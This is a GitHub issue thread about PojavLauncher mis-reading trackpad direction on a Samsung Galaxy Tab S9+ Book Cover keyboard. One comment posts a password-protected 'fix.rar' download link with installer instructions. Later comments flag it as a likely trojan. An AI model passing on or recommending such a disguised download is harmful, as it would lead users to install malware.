### ISSUE TITLE
[BUG] When using Samsung Book Cover keyboard, the trackpad registers weird movements

### ISSUE THREAD

**Issue by MerBudd** [PojavLauncherTeam/PojavLauncher#5984]
### Describe the bug

Hi, I have a Samsung Galaxy Tab S9+ with the official Book Cover Keyboard case. The case has a trackpad, but when using said trackpad, it moves in weird directions.

I have seen other similar issues, but those were about insanely fast movement and the trackpad just not working at all. My issue is that my trackpad DOES work, but it gets the directions wrong (kind of). I don't know how to exactly explain this so I'll just give an example:
When moving my finger up on the trackpad, the camera/cursor DOES move up, but it also moves right. Or when I move my finger to the right, the camera does move to the right but also moves to the bottom.
The trackpad does work as expected on every other app, so this is a bit weird.

### The log file and images/videos

[latestlog.txt](https://github.com/user-attachments/files/16763821/latestlog.txt)

### Steps To Reproduce

```markdown
1. Start PojavLauncher with Samsung Book Cover keyboard attached
2. Start Minecraft
```

### Expected Behavior

I expect the trackpad to work normally and register my movements normally

### Platform

```markdown
- Device model: Samsung Galaxy Tab S9+
- CPU architecture: arm64/AArch64
- Android version: Android 14 with one UI 6.1, July Security patch
- PojavLauncher version: foxglove-20240727-ae48e8e-v3_openjdk
```

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GaucovyAero** [comment]
^ most likely malware

**Comment by GaucovyAero** [comment]
duplicate of #5158

**Comment by MerBudd** [comment]
This issue, while similar, is not a duplicate of #5158 (as I stated in the describe the bug section). #5158 is about the trackpad being crazy fast. This is different (as I stated in the describe the bug section). Also how would you conclude "most likely malware" if I literally stated the trackpad works fine everywhere else? I should also mention that the trackpad ALSO works fine in the launcher, it just breaks in the actual game, so I'm 99.999% this isn't some type of malware.

**Comment by CowSheep72** [comment]
> This issue, while similar, is not a duplicate of #5158 (as I stated in the describe the bug section). #5158 is about the trackpad being crazy fast. This is different (as I stated in the describe the bug section). Also how would you conclude "most likely malware" if I literally stated the trackpad works fine everywhere else? I should also mention that the trackpad ALSO works fine in the launcher, it just breaks in the actual game, so I'm 99.999% this isn't some type of malware.

someone may have tried to distribute a trojan below your issue

**Comment by CowSheep72** [comment]
> This issue, while similar, is not a duplicate of #5158 (as I stated in the describe the bug section). #5158 is about the trackpad being crazy fast. This is different (as I stated in the describe the bug section). Also how would you conclude "most likely malware" if I literally stated the trackpad works fine everywhere else? I should also mention that the trackpad ALSO works fine in the launcher, it just breaks in the actual game, so I'm 99.999% this isn't some type of malware.

![Screenshot_20240827-164033](https://github.com/user-attachments/assets/bc8c474e-24ba-4631-a4e7-fcc16065a6a8)
this fyi

**Comment by CowSheep72** [comment]
> This issue, while similar, is not a duplicate of #5158 (as I stated in the describe the bug section). #5158 is about the trackpad being crazy fast. This is different (as I stated in the describe the bug section). Also how would you conclude "most likely malware" if I literally stated the trackpad works fine everywhere else? I should also mention that the trackpad ALSO works fine in the launcher, it just breaks in the actual game, so I'm 99.999% this isn't some type of malware.

![Screenshot_2024-08-28-07-03-47-347_com discord-edit](https://github.com/user-attachments/assets/d2f6a671-549e-4125-afbe-21d1897ce540)
this fyi

**Comment by ghost** [comment]
> > This issue, while similar, is not a duplicate of #5158 (as I stated in the describe the bug section). #5158 is about the trackpad being crazy fast. This is different (as I stated in the describe the bug section). Also how would you conclude "most likely malware" if I literally stated the trackpad works fine everywhere else? I should also mention that the trackpad ALSO works fine in the launcher, it just breaks in the actual game, so I'm 99.999% this isn't some type of malware.
> 
> ![Screenshot_2024-08-28-07-03-47-347_com discord-edit](https://private-user-images.githubusercontent.com/112483749/362008479-d2f6a671-549e-4125-afbe-21d1897ce540.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MDQ2NTYsIm5iZiI6MTcyNDgwNDM1NiwicGF0aCI6Ii8xMTI0ODM3NDkvMzYyMDA4NDc5LWQyZjZhNjcxLTU0OWUtNDEyNS1hZmJlLTIxZDE4OTdjZTU0MC5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyOFQwMDE5MTZaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jZGRlYjg1NDQ3N2QwYzQyMjNiNDBjOGM3OTM4Y2MxYmQ4NWE5MjI0MmJlZDYwZTdiZDcyNDM0ZjUyYTBlODQ5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.ewxsS-_-fH_dX2UrJ6UbA8jK1KfH1Ayl6nHCZ502LNE) this fyi

Yeah and send malware even in discord if any boddy send this link and password report it and take screen shot to proof if need for GitHub server or in discord

**Comment by CowSheep72** [comment]
> > > This issue, while similar, is not a duplicate of #5158 (as I stated in the describe the bug section). #5158 is about the trackpad being crazy fast. This is different (as I stated in the describe the bug section). Also how would you conclude "most likely malware" if I literally stated the trackpad works fine everywhere else? I should also mention that the trackpad ALSO works fine in the launcher, it just breaks in the actual game, so I'm 99.999% this isn't some type of malware.
> > 
> > 
> > ![Screenshot_2024-08-28-07-03-47-347_com discord-edit](https://private-user-images.githubusercontent.com/112483749/362008479-d2f6a671-549e-4125-afbe-21d1897ce540.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4MDQ2NTYsIm5iZiI6MTcyNDgwNDM1NiwicGF0aCI6Ii8xMTI0ODM3NDkvMzYyMDA4NDc5LWQyZjZhNjcxLTU0OWUtNDEyNS1hZmJlLTIxZDE4OTdjZTU0MC5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI4JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyOFQwMDE5MTZaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jZGRlYjg1NDQ3N2QwYzQyMjNiNDBjOGM3OTM4Y2MxYmQ4NWE5MjI0MmJlZDYwZTdiZDcyNDM0ZjUyYTBlODQ5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.ewxsS-_-fH_dX2UrJ6UbA8jK1KfH1Ayl6nHCZ502LNE) this fyi
> 
> Yeah and send malware even in discord if any boddy send this link and password report it and take screen shot to proof if need for GitHub server or in discord

???
